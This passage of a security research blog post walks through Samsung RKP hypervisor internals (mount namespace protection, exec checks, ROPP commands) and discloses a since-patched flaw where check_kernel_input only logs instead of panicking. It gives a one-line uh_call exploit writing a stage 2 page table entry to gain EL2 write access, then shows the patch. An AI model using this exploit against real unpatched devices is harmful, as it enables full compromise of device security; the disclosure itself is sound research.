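The vfsmount structure contains various fields that the kernel needs to change at some point. As with the other protected structures, it cannot do so by itself and instead needs to call the hypervisor.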

The following table lists, for each field, the kernel function that calls the command and the hypervisor function that handles it.

Field	Kernel function	Hypervisor function
`mnt_root`/`mnt_sb`	`rkp_set_mnt_root_sb`	`rkp_cmd_ns_set_root_sb`
`mnt_flags`	`rkp_assign_mnt_flags`	`rkp_cmd_ns_set_flags`
`data`	`rkp_set_data`	`rkp_cmd_ns_set_data`

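The mnt_root field (a pointer to the root of the mounted tree, an instance of the dentry structure) and the mnt_sb field (a pointer to the super_block structure) are changed using the rkp_set_mnt_root_sb function, which calls the RKP_KDP_X53 command.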

▸ fs/namespace.c

void rkp_set_mnt_root_sb(struct vfsmount *mnt,  struct dentry *mnt_root,struct super_block *mnt_sb)
{
    uh_call(UH_APP_RKP, RKP_KDP_X53, (u64)mnt, (u64)mnt_root, (u64)mnt_sb, 0);
}

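This command is handled by the rkp_cmd_ns_set_root_sb hypervisor function, which calls rkp_ns_set_root_sb. This function calls chk_invalid_ns to check the integrity of the vfsmount structure, and sets its mnt_root and mnt_sb fields to the values given as arguments.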

void rkp_ns_set_root_sb(saved_regs_t* regs) {
  // ...

  // Convert the vfsmount structure VA into a PA.
  vfsmnt = rkp_get_pa(regs->x2);
  // Ensure the structure is valid and hypervisor-protected.
  if (!chk_invalid_ns(vfsmnt)) {
    // Set the mnt_root field of the vfsmount structure to the dentry instance.
    *vfsmnt = regs->x3;
    // Set the mnt_sb field of the vfsmount structure to the super_block instance.
    *(vfsmnt + 8 * rkp_cred->SB_VFSMNT_OFFSET) = regs->x4;
  }
}

The mnt_flags field, which contains flags such as MNT_NOSUID, MNT_NODEV, MNT_NOEXEC, etc., is changed using the rkp_assign_mnt_flags function, which calls the RKP_KDP_X54 command.

▸ fs/namespace.c

void rkp_assign_mnt_flags(struct vfsmount *mnt,int flags)
{
    uh_call(UH_APP_RKP, RKP_KDP_X54, (u64)mnt, (u64)flags, 0, 0);
}

Two other functions call rkp_assign_mnt_flags. The first one, rkp_set_mnt_flags, is used to set one or more flags.

▸ fs/namespace.c

void rkp_set_mnt_flags(struct vfsmount *mnt,int flags)
{
    int f = mnt->mnt_flags;
    f |= flags;
    rkp_assign_mnt_flags(mnt,f);
}

Unsurprisingly, the second one, rkp_reset_mnt_flags, is used to unset one or more flags.

▸ fs/namespace.c

void rkp_reset_mnt_flags(struct vfsmount *mnt,int flags)
{
    int f = mnt->mnt_flags;
    f &= ~flags;
    rkp_assign_mnt_flags(mnt,f);
}

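This command is handled by the rkp_cmd_ns_set_flags hypervisor function, which calls rkp_ns_set_flags. This function calls chk_invalid_ns to check the integrity of the vfsmount structure, and sets its flags field to the value given as argument.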

void rkp_ns_set_flags(saved_regs_t* regs) {
  // ...

  // Convert the vfsmount structure VA into a PA.
  vfsmnt = rkp_get_pa(regs->x2);
  // Ensure the structure is valid and hypervisor-protected.
  if (!chk_invalid_ns(vfsmnt)) {
    // Set the flags field of the vfsmount structure.
    *(vfsmnt + 4 * rkp_cred->FLAGS_VFSMNT_OFFSET) = regs->x3;
  }
}

The data field, which contains type-specific data, is changed using the rkp_set_data function, which calls the RKP_KDP_X55 command.

▸ fs/namespace.c

void rkp_set_data(struct vfsmount *mnt,void *data)
{
    uh_call(UH_APP_RKP, RKP_KDP_X55, (u64)mnt, (u64)data, 0, 0);
}

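This command is handled by the rkp_cmd_ns_set_data hypervisor function, which calls rkp_ns_set_data. This function calls chk_invalid_ns to check the integrity of the vfsmount structure, and sets its data field to the value given as argument.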

void rkp_ns_set_data(saved_regs_t* regs) {
  // ...

  // Convert the vfsmount structure VA into a PA.
  vfsmnt = rkp_get_pa(regs->x2);
  // Ensure the structure is valid and hypervisor-protected.
  if (!chk_invalid_ns(vfsmnt)) {
    // Set the data field of the vfsmount structure.
    *(vfsmnt + 8 * rkp_cred->DATA_VFSMNT_OFFSET) = regs->x3;
  }
}

New Mountpoint

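The last command called as part of the namespace protection feature is the RKP_KDP_X56 command. It is called by the rkp_populate_sb function when a new mount is being created. This function checks the path of the mount point against the list below, and calls the hypervisor if it is one of these specific paths.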

/root
/product
/system
/vendor
/apex/com.android.runtime
/com.android.runtime@1

▸ fs/namespace.c

int art_count = 0;

static void rkp_populate_sb(char *mount_point, struct vfsmount *mnt)
{
    if (!mount_point || !mnt)
        return;
    if (!odm_sb &&
        !strncmp(mount_point, KDP_MOUNT_PRODUCT, KDP_MOUNT_PRODUCT_LEN)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&odm_sb, (u64)mnt, KDP_SB_ODM, 0);
    } else if (!rootfs_sb &&
        !strncmp(mount_point, KDP_MOUNT_ROOTFS, KDP_MOUNT_ROOTFS_LEN)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&rootfs_sb, (u64)mnt, KDP_SB_SYS, 0);
    } else if (!sys_sb &&
        !strncmp(mount_point, KDP_MOUNT_SYSTEM, KDP_MOUNT_SYSTEM_LEN)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&sys_sb, (u64)mnt, KDP_SB_SYS, 0);
    } else if (!vendor_sb &&
        !strncmp(mount_point, KDP_MOUNT_VENDOR, KDP_MOUNT_VENDOR_LEN)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&vendor_sb, (u64)mnt, KDP_SB_VENDOR, 0);
    } else if (!art_sb &&
        !strncmp(mount_point, KDP_MOUNT_ART, KDP_MOUNT_ART_LEN - 1)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&art_sb, (u64)mnt, KDP_SB_ART, 0);
    } else if ((art_count < ART_ALLOW) &&
        !strncmp(mount_point, KDP_MOUNT_ART2, KDP_MOUNT_ART2_LEN - 1)) {
        if (art_count)
            uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&art_sb, (u64)mnt, KDP_SB_ART, 0);
        art_count++;
    }
}

rkp_populate_sb is called from do_new_mount, which is itself called from do_mount.

▸ fs/namespace.c

static int do_new_mount(struct path *path, const char *fstype, int sb_flags,
            int mnt_flags, const char *name, void *data)
{
    // ...
    buf = kzalloc(PATH_MAX, GFP_KERNEL);
    if (!buf){
        kfree(buf);
        return -ENOMEM;
    }
    dir_name = dentry_path_raw(path->dentry, buf, PATH_MAX);

    if(!sys_sb || !odm_sb || !vendor_sb || !rootfs_sb || !art_sb || (art_count < ART_ALLOW))
        rkp_populate_sb(dir_name,mnt);
    kfree(buf);
    // ...
}

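On the hypervisor side, the command is handled by rkp_cmd_ns_set_sys_vfsmnt, which calls rkp_ns_set_sys_vfsmnt. It ensures that the vfsmount structure given as argument is valid by calling chk_invalid_ns. It then copies its mnt_sb field (the pointer to the superblock of the source file system mount) into the destination superblock pointer, and also stores this value in one of the fields of the rkp_cred structure.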

void* rkp_ns_set_sys_vfsmnt(saved_regs_t* regs) {
  // ...

  // If the `rkp_cred` structure is not initialized, i.e. `rkp_cred_init` has not been called.
  if (!rkp_cred) {
    uh_log('W', "rkp_kdp.c", 931, "RKP_ae6cae81");
    return;
  }
  // Convert the destination superblock VA to a PA.
  dst_sb = rkp_get_pa(regs->x2);
  // Convert the source file system mount VA to a PA.
  vfsmnt = rkp_get_pa(regs->x3);
  // Get the enum value indicating which mount point this is.
  mount_point = regs->x4;
  // Ensure the vfsmnt structure is valid and hypervisor-protected.
  if (!vfsmnt || chk_invalid_ns(vfsmnt) || mount_point >= KDP_SB_MAX) {
    uh_log('L', "rkp_kdp.c", 945, "Invalid  source vfsmnt  %lx %lx %lx\n", regs->x3, vfsmnt, mount_point);
    return;
  }
  // Sanity-check: the destination superblock must not be NULL.
  if (!dst_sb) {
    uh_log('L', "rkp_kdp.c", 956, "dst_sb is NULL %lx %lx %lx\n", regs->x2, 0, regs->x3);
    return;
  }
  // Get the mnt_sb field (pointer to superblock) of the vfsmount structure.
  mnt_sb = *(vfsmnt + 8 * rkp_cred->SB_VFSMNT_OFFSET);
  // Set the pointer to the destination superblock to the mnt_sb field value.
  *dst_sb = mnt_sb;
  // Depending on the mount point, set the corresponding field of the `rkp_cred` structure.
  switch (mount_point) {
    case KDP_SB_ROOTFS:
      *rkp_cred->SB_ROOTFS = mnt_sb;
      break;
    case KDP_SB_ODM:
      *rkp_cred->SB_ODM = mnt_sb;
      break;
    case KDP_SB_SYS:
      *rkp_cred->SB_SYS = mnt_sb;
      break;
    case KDP_SB_VENDOR:
      *rkp_cred->SB_VENDOR = mnt_sb;
      break;
    case KDP_SB_ART:
      *rkp_cred->SB_ART = mnt_sb;
      break;
  }
}

Executable Loading

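The mount namespace protection feature allows for additional checks when executable binaries are loaded by the kernel. The verification happens in the flush_old_exec function, which is called from the loaders of the supported binary formats (see this LWN.net article). This mechanism also prevents abuse of the call_usermodehelper function, which was used in a previous Samsung RKP bypass.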

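If the current task is privileged, which is determined by calling is_rkp_priv_task, the flush_old_exec function calls invalid_drive to ensure that the mount point of the executable is valid. If it is not, it makes the kernel panic.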

▸ fs/exec.c

int flush_old_exec(struct linux_binprm * bprm)
{
    // ...
    if(rkp_cred_enable &&
        is_rkp_priv_task() && 
        invalid_drive(bprm)) {
        panic("\n KDP_NS_PROT: Illegal Execution of file #%s#\n", bprm->filename);
    }
    // ...
}

is_rkp_priv_task simply checks whether the UID, EUID, GID, or EGID of the current task is lower than or equal to 1000 (SYSTEM).

▸ fs/exec.c

#define RKP_CRED_SYS_ID 1000

static int is_rkp_priv_task(void)
{
    struct cred *cred = (struct cred *)current_cred();
    if(cred->uid.val <= (uid_t)RKP_CRED_SYS_ID || cred->euid.val <= (uid_t)RKP_CRED_SYS_ID ||
        cred->gid.val <= (gid_t)RKP_CRED_SYS_ID || cred->egid.val <= (gid_t)RKP_CRED_SYS_ID ){
        return 1;
    }
    return 0;
}

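invalid_drive first retrieves the vfsmount structure from the file structure of the binary being loaded. It ensures that it is hypervisor-protected by calling rkp_ro_page (though that does not mean it is necessarily of the expected type). It then passes its superblock to the kdp_check_sb_mismatch function to determine whether the mount point is valid.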

▸ fs/exec.c

static int invalid_drive(struct linux_binprm * bprm) 
{
    struct super_block *sb =  NULL;
    struct vfsmount *vfsmnt = NULL;

    vfsmnt = bprm->file->f_path.mnt;
    if(!vfsmnt || 
        !rkp_ro_page((unsigned long)vfsmnt)) {
        printk("\nInvalid Drive #%s# #%p#\n",bprm->filename, vfsmnt);
        return 1;
    } 
    sb = vfsmnt->mnt_sb;
    if(kdp_check_sb_mismatch(sb)) {
        printk("\n Superblock Mismatch #%s# vfsmnt #%p#sb #%p:%p:%p:%p:%p:%p#\n",
                    bprm->filename, vfsmnt, sb, rootfs_sb, sys_sb, odm_sb, vendor_sb, art_sb);
        return 1;
    }
    return 0;
}

kdp_check_sb_mismatch, if the device is neither in recovery nor unlocked, compares the superblock with the allowed ones, i.e. those of /root, /system, /product, /vendor, and /apex/com.android.runtime.

▸ fs/exec.c

static int kdp_check_sb_mismatch(struct super_block *sb) 
{   
    if(is_recovery || __check_verifiedboot) {
        return 0;
    }
    if((sb != rootfs_sb) && (sb != sys_sb)
        && (sb != odm_sb) && (sb != vendor_sb) && (sb != art_sb)) {
        return 1;
    }
    return 0;
}

JOPP and ROPP Commands

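We explained in the section about kernel exploitation that JOPP is only enabled on high-end Samsung devices, and ROPP on high-end Snapdragon devices. For this subsection about the hypervisor commands related to these features, we will be looking at the kernel source code and RKP binary of a Snapdragon device (the US version of the S10).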

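We believe that the initialization commands of JOPP and ROPP in the hypervisor, rkp_cmd_jopp_init and rkp_cmd_ropp_init respectively, are called by the bootloader (S-Boot), though we could not confirm it.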

The first command handler, rkp_cmd_jopp_init, does nothing of interest.

int64_t rkp_cmd_jopp_init() {
  uh_log('L', "rkp.c", 502, "CFP JOPP Enabled");
  return 0;
}

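The second command handler, rkp_cmd_ropp_init, expects an argument structure that must start with a magic value (0x4A4C4955). This structure is copied to a fixed physical address (0xB0240020). If the memory at another physical address (0x80001000) matches another magic value (0xCDEFCDEF), the structure is copied again to one last physical address (0x80001020).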

int64_t rkp_cmd_ropp_init(saved_regs_t* regs) {
  // ...

  // Convert the argument structure VA to a PA.
  arg_struct = virt_to_phys_el1(regs->x2);
  // Check if it begins with the expected magic value.
  if (*arg_struct == 0x4a4c4955) {
    // Copy the structure to a fixed physical address.
    memcpy(0xb0240020, arg_struct, 80);
    // If the memory at another PA contains another magic value.
    if (*(uint32_t*)0x80001000 == 0xcdefcdef) {
      // Copy the structure to another fixed PA.
      memcpy(0x80001020, arg_struct, 80);
    }
    uh_log('L', "rkp.c", 529, "CFP ROPP Enabled");
  } else {
    uh_log('W', "rkp.c", 515, "RKP_e08bc280");
  }
  return 0;
}

In addition, ROPP uses two other commands, rkp_cmd_ropp_save and rkp_cmd_ropp_reload, to handle the "master key".

rkp_cmd_ropp_save does nothing and is probably called by the bootloader, but once again we could not confirm it.

int64_t rkp_cmd_ropp_save() {
  return 0;
}

rkp_cmd_ropp_reload is called by the kernel in the ropp_secondary_init assembly macro.

▸ arch/arm64/include/asm/rkp_cfp.h

/*
 * secondary core will start a forked thread, so rrk is already enc'ed
 * so only need to reload the master key and thread key
 */
    .macro ropp_secondary_init ti
    reset_sysreg
    //load master key from rkp
    ropp_load_mk
    //load thread key
    ropp_load_key \ti
    .endm

    .macro ropp_load_mk
#ifdef CONFIG_UH
    push    x0, x1
    push    x2, x3
    push    x4, x5
    mov x1, #0x10 //RKP_ROPP_RELOAD
    mov x0, #0xc002 //UH_APP_RKP
    movk    x0, #0xc300, lsl #16
    smc #0x0
    pop x4, x5
    pop x2, x3
    pop x0, x1
#else
    push    x0, x1
    ldr x0, = ropp_master_key
    ldr x0, [x0]
    msr RRMK, x0
    pop x0, x1
#endif
    .endm
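
The value that the macro places in x0 before the smc instruction is built in two steps, with mov setting the low 16 bits and movk overwriting bits 16 to 31. The small C sketch below, whose function name is hypothetical, reproduces that computation so the resulting identifier can be read off directly.

```c
#include <stdint.h>

/* Emulates `mov x0, #low` followed by `movk x0, #high, lsl #16`. */
static uint64_t sketch_mov_movk16(uint16_t low, uint16_t high) {
  uint64_t x0 = low; /* mov writes the immediate and zeroes the other bits */
  /* movk replaces only bits [31:16] and keeps the rest of the register */
  x0 = (x0 & ~(0xffffull << 16)) | ((uint64_t)high << 16);
  return x0;
}
```

For the immediates used in ropp_load_mk, 0xc002 and 0xc300, this gives 0xc300c002. Read against the Arm SMC Calling Convention, bit 31 marks a fast call, bit 30 the 64-bit convention, and bits 29 to 24 (here 0x03) the OEM service range, while x1 carries the command number (0x10, RKP_ROPP_RELOAD).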

This macro is called from the __secondary_switched assembly function, which is executed when a secondary core is being booted.

▸ arch/arm64/kernel/head.S

__secondary_switched:
    // ...
    ropp_secondary_init x2
    // ...
ENDPROC(__secondary_switched)

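rkp_cmd_ropp_reload, the command handler itself, sets the DBGBVR5_EL1 system register (which holds the RRMK, the "master key" used by the ROPP feature) to the value read from a fixed physical address (0xB0240028).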

int64_t rkp_cmd_ropp_reload() {
  set_dbgbvr5_el1(*(uint32_t*)0xb0240028);
  return 0;
}

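This concludes our explanation of the inner workings of Samsung RKP. We have detailed how the hypervisor is initialized, how it handles exceptions coming from lower ELs, and how it processes the kernel page tables, all of this to protect the critical kernel data structures that could be targeted by an exploit.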

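We will now reveal a vulnerability that we found, and that has since been fixed, which allows executing code at EL2. We will exploit this vulnerability on an Exynos device, but it should also work on Snapdragon devices with some minor changes.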

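Here is some information about the binaries that we are looking at:

Exynos device - Samsung A51 (SM-A515F)

Firmware version: A515FXXU3BTF4
Hypervisor version: Feb 27 2020

Snapdragon device - Samsung Galaxy S10 (SM-G973U)

Firmware version: G973USQU4ETH7
Hypervisor version: Feb 25 2020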

Description¶

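If you have been paying close attention while reading this blog post, you might have noticed two important functions that we have not detailed yet: uh_log and rkp_get_pa. Let's go over them now, starting with uh_log.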

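uh_log does some fairly standard string formatting and printing, which we have omitted from the snippet below, but it also does something else. If the log level given as the first argument is 'D' (debug), it also calls uh_panic. This will become important in a moment...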

int64_t uh_log(char level, const char* filename, uint32_t linenum, const char* message, ...) {
  // ...
  if (level == 'D') {
    uh_panic();
  }
  return res;
}

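We now turn our attention to rkp_get_pa, which many command handlers call to translate kernel input. If the virtual address is in the fixmap, it computes the physical address from PHYS_OFFSET (the start of the kernel physical memory). If it is not in the fixmap, it calls virt_to_phys_el1 to perform a hardware translation. If the hardware translation fails, it computes the physical address from KIMAGE_VOFFSET (the offset between kernel VAs and PAs). Finally, it calls check_kernel_input to check whether the address can be used.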

int64_t rkp_get_pa(uint64_t vaddr) {
  // ...
  if (!vaddr) {
    return 0;
  }
  if (vaddr < 0xffffffc000000000) {
    paddr = virt_to_phys_el1(vaddr);
    if (!paddr) {
      if ((vaddr & 0x4000000000) != 0) {
        paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
      } else {
        paddr = vaddr - KIMAGE_VOFFSET;
      }
    }
  } else {
    paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
  }
  check_kernel_input(paddr);
  return paddr;
}
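To make the arithmetic concrete, here is a minimal sketch of the two software fallbacks in rkp_get_pa, that is, the results it produces when no hardware translation is available. The values chosen for `SKETCH_PHYS_OFFSET` and `SKETCH_KIMAGE_VOFFSET` are placeholders picked for illustration, not values taken from the binary, and the `sketch_` names are ours.

```c
#include <stdint.h>

/* Assumed values, for illustration only. */
#define SKETCH_PHYS_OFFSET    0x80000000ULL
#define SKETCH_KIMAGE_VOFFSET 0xffffff7f88000000ULL

/* Software-only part of the translation: the AT-based hardware
 * lookup is deliberately left out, as if it had failed. */
static uint64_t sketch_get_pa_sw(uint64_t vaddr) {
  if (!vaddr)
    return 0;
  /* Addresses at or above 0xffffffc000000000, or with bit 38 set,
   * are rebased onto PHYS_OFFSET using their low 38 bits. */
  if (vaddr >= 0xffffffc000000000ULL || (vaddr & 0x4000000000ULL))
    return SKETCH_PHYS_OFFSET + (vaddr & 0x3fffffffffULL);
  /* Otherwise the fixed VA/PA offset of the kernel image is removed. */
  return vaddr - SKETCH_KIMAGE_VOFFSET;
}
```

Under these assumed constants, `sketch_get_pa_sw(0xffffffc000001000)` gives `0x80001000` and `sketch_get_pa_sw(0xffffff8008080000)` gives `0x80080000`. Note that nothing in this computation restricts the result to memory the kernel is allowed to name, which is why the final check_kernel_input call matters.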

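virt_to_phys_el1 uses the AT S12E1R instruction (stage 1 and 2 translation at EL1, read access) to translate the virtual address. If the translation simulating a kernel read access fails, it uses the AT S12E1W instruction (stage 1 and 2 translation at EL1, write access). If the translation simulating a kernel write access also fails and the MMU is enabled, it prints the stack contents.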

int64_t virt_to_phys_el1(int64_t vaddr) {
  // ...
  if (vaddr) {
    at_s12e1r(vaddr);
    par_el1 = get_par_el1();
    if ((par_el1 & 1) != 0) {
      at_s12e1w(vaddr);
      par_el1 = get_par_el1();
    }
    if ((par_el1 & 1) != 0) {
      if ((get_sctlr_el1() & 1) != 0) {
        uh_log('W', "general.c", 128, "%s: wrong address %p", "virt_to_phys_el1", vaddr);
        if (!has_printed_stack_contents) {
          has_printed_stack_contents = 1;
          print_stack_contents();
        }
        has_printed_stack_contents = 0;
      }
      vaddr = 0;
    } else {
      vaddr = par_el1 & 0xfffffffff000 | vaddr & 0xfff;
    }
  }
  return vaddr;
}
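The way the result of an AT instruction is read back from PAR_EL1 can be sketched in isolation. The two helpers below are ours (hypothetical names) and only reuse the masks visible in the decompiled function: bit 0 of PAR_EL1 flags a failed translation, and on success the output frame is combined with the page offset of the original address.

```c
#include <stdbool.h>
#include <stdint.h>

/* PAR_EL1 bit 0 (F) is set when the address translation aborted. */
static bool par_failed(uint64_t par_el1) {
  return (par_el1 & 1) != 0;
}

/* Combine the output frame held in PAR_EL1 with the low 12 bits of
 * the virtual address, using the same masks as virt_to_phys_el1. */
static uint64_t par_to_pa(uint64_t par_el1, uint64_t vaddr) {
  return (par_el1 & 0xfffffffff000ULL) | (vaddr & 0xfffULL);
}
```

For instance, a made-up PAR_EL1 value of `0xff00000087654b80` has bit 0 clear, and `par_to_pa(0xff00000087654b80, 0xffffffc007654abc)` yields `0x87654abc`: the attribute bits at the top and bottom of the register are masked away and only the frame number survives.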

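The check_kernel_input function reports whether a VA provided by the kernel, once converted to a PA, can be safely used. It only checks whether the physical address is contained in the protected_ranges memlist. As explained in the "Overall State After Startup" section, after startup this memlist contains:

0x87000000-0x87200000 (the uH region), added in pa_restrict_init;
all the bitmaps of the physmap, added in init_cmd_initialize_dynamic_heap.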

int64_t check_kernel_input(uint64_t paddr) {
  // ...
  res = protected_ranges_contains(paddr);
  if (res) {
    res = uh_log('L', "pa_restrict.c", 94, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
  }
  return res;
}

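This should effectively prevent the kernel from giving an address that, once translated, falls into hypervisor memory. However, when the check fails, uh_log is called with level 'L' instead of level 'D', which means that the hypervisor does not panic and execution continues as if nothing had happened. The impact of this simple mistake is huge: we can give addresses inside hypervisor memory to all command handlers.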
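The effect of the log level can be modelled in a few lines. This is a simplified sketch, not the hypervisor's code: it uses a single protected range (the uH region quoted above, with the end address assumed to be exclusive), and the function names are ours.

```c
#include <stdbool.h>
#include <stdint.h>

/* Single protected range taken from the text: the uH region.
 * Treating the end as exclusive is an assumption. */
#define UH_REGION_START 0x87000000ULL
#define UH_REGION_END   0x87200000ULL

static bool in_uh_region(uint64_t paddr) {
  return paddr >= UH_REGION_START && paddr < UH_REGION_END;
}

/* Model of the logging policy described for uh_log:
 * only level 'D' ends in uh_panic. */
static bool log_level_halts(char level) {
  return level == 'D';
}

/* Returns true when a command handler would go on to use `paddr`.
 * rkp_get_pa ignores the return value of check_kernel_input, so the
 * only thing that can stop it is a panic inside uh_log. */
static bool handler_continues(uint64_t paddr, char level_on_violation) {
  if (in_uh_region(paddr) && log_level_halts(level_on_violation))
    return false; /* uh_panic() would be reached */
  return true;
}
```

In this model, `handler_continues(0x8702a1c0, 'L')` is true, which is the vulnerable behaviour, while the same address with level `'D'` stops execution.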

Exploitation¶

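Exploiting this vulnerability is trivial. Calling one of the command handlers with the right arguments is enough to immediately get an arbitrary write. For example, we can use the RKP_CMD_WRITE_PGT3 command, which is handled by the rkp_l3pgt_write function that we saw earlier. It is then only a matter of finding what to write, and where to write it, to compromise the hypervisor.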

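Below is our one-liner exploit. It targets the stage 2 page tables of our device by adding a level 2 block descriptor that spans the whole hypervisor memory. Because the S2AP bits of the descriptor are set to 0b11, the memory mapping is writable, and because the WXN bit set in s1_enable only applies to address translation at EL2 and not at EL1, we can now freely modify the hypervisor code from the kernel.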

uh_call(UH_APP_RKP, RKP_CMD_WRITE_PGT3, 0xffffffc00702a1c0, 0x870004fd);
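The value written by the one-liner can be decoded field by field. The sketch below follows the Armv8-A stage 2 block descriptor layout for a 4 KiB granule. The helper names are ours, and the index computation rests on two assumptions that the text does not state: that PHYS_OFFSET is 0x80000000, and that the targeted level 2 table covers the 1 GiB range starting at that address.

```c
#include <stdint.h>

/* Stage 2 block descriptor fields (Armv8-A, 4 KiB granule). */
static unsigned desc_type(uint64_t d)    { return (unsigned)(d & 0x3); }         /* 0b01 = block      */
static unsigned desc_memattr(uint64_t d) { return (unsigned)((d >> 2) & 0xf); }  /* memory attributes */
static unsigned desc_s2ap(uint64_t d)    { return (unsigned)((d >> 6) & 0x3); }  /* 0b11 = read/write */
static unsigned desc_af(uint64_t d)      { return (unsigned)((d >> 10) & 0x1); } /* access flag       */

/* Output address of a level 2 block: bits [47:21], 2 MiB aligned. */
static uint64_t desc_l2_block_pa(uint64_t d) {
  return d & 0x0000ffffffe00000ULL;
}

/* Index of the level 2 entry mapping `pa` in a table whose first
 * entry maps `range_base` (each entry covers 2 MiB). */
static unsigned l2_index(uint64_t pa, uint64_t range_base) {
  return (unsigned)((pa - range_base) >> 21);
}
```

Decoding `0x870004fd` gives a block descriptor (type 0b01) with S2AP 0b11, the access flag set, and an output address of `0x87000000`, the start of the uH region. Under the stated assumptions, the entry for that block has index 56, and the written address `0xffffffc00702a1c0` has a page offset of `0x1c0`, which is also 56 eight-byte entries into a table. The two numbers are consistent with the write landing on the slot that maps the hypervisor's own 2 MiB.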

Patch¶

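We noticed that binaries built after May 27 2020 include a patch for this vulnerability, but we do not know whether it was privately disclosed or found internally. It should have affected all devices with Exynos and Snapdragon chipsets.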

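Let's take a look at the latest firmware update available for our research device to see what changed, starting with the check_kernel_input function. Interestingly, instead of simply changing the log level, they duplicated the call to uh_log. It is odd, but at least it does the job.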

int64_t check_kernel_input(uint64_t paddr) {
  // ...
  res = protected_ranges_contains(paddr);
  if (res) {
    uh_log('L', "pa_restrict.c", 94, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
    uh_log('D', "pa_restrict.c", 96, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
  }
  return res;
}

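While binary diffing, we also noticed that they added some extra checks in rkp_get_pa. They now enforce that the physical address is contained in the dynamic_regions memlist. Better safe than sorry!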

int64_t rkp_get_pa(uint64_t vaddr) {
  // ...
  if (!vaddr) {
    return 0;
  }
  if (vaddr < 0xffffffc000000000) {
    paddr = virt_to_phys_el1(vaddr);
    if (!paddr) {
      if ((vaddr & 0x4000000000) != 0) {
        paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
      } else {
        paddr = vaddr - KIMAGE_VOFFSET;
      }
    }
  } else {
    paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
  }
  check_kernel_input(paddr);
  if (!memlist_contains_addr(&uh_state.dynamic_regions, paddr)) {
    uh_log('L', "rkp_paging.c", 70, "RKP_68592c58 %lx", paddr);
    uh_log('D', "rkp_paging.c", 71, "RKP_68592c58 %lx", paddr);
  }
  return paddr;
}

Let's recap the various protections offered by Samsung RKP:

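the page tables cannot be directly modified by the kernel;
    except for level 3 tables, but in that case the PXNTable bit is set;
accesses to the virtual memory system registers at EL1 are trapped;
page tables are set as read-only in the stage 2 address translation;
double mappings are prevented, but the checking is only done by the kernel;
    it is still not possible to make the kernel text read-write or a new region executable;
sensitive kernel global variables are moved into the .rodata region (read-only);
sensitive kernel data structures (cred, task_security_struct, vfsmount) are allocated on read-only pages, thanks to the modifications made by Samsung to the SLUB allocator;
on various operations, the credentials of the running task are checked:
    a task that is not system cannot suddenly become system or root;
    the cred field of a task_struct can still be set;
    but the next operation, such as executing a shell, will trigger a violation;
credentials are also reference-counted to prevent them from being reused by another task;
it is not possible to execute a binary as root from outside of specific mount points;
on Snapdragon devices, ROPP (ROP prevention) is also enabled by RKP.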

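In this deep dive into the internals of Samsung RKP, we have seen how a security hypervisor can help prevent kernel exploitation. Like other defense-in-depth measures, it makes it harder for an attacker who has gained read-write access to fully compromise the kernel. But this great engineering work does not prevent (sometimes simple) mistakes from being made in the implementation.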

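There is more about the hypervisor that we did not cover here and that deserves follow-up blog posts: unpatched vulnerabilities that we cannot talk about yet, an explanation of the differences between the Exynos and Snapdragon implementations, a deep dive into the new framework of the S20, and so on.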



Article source: http://mp.weixin.qq.com/s?__biz=MzkwOTE5MDY5NA==&mid=2247491046&idx=2&sn=04b5df71d886b42d2cee28e30f65e1f5&chksm=c04983183180de38e7bf81669a8eb4dbc44a329eac5ff5341cbe7237c60f4a016c6f5385052f&scene=0&xtrack=1#rd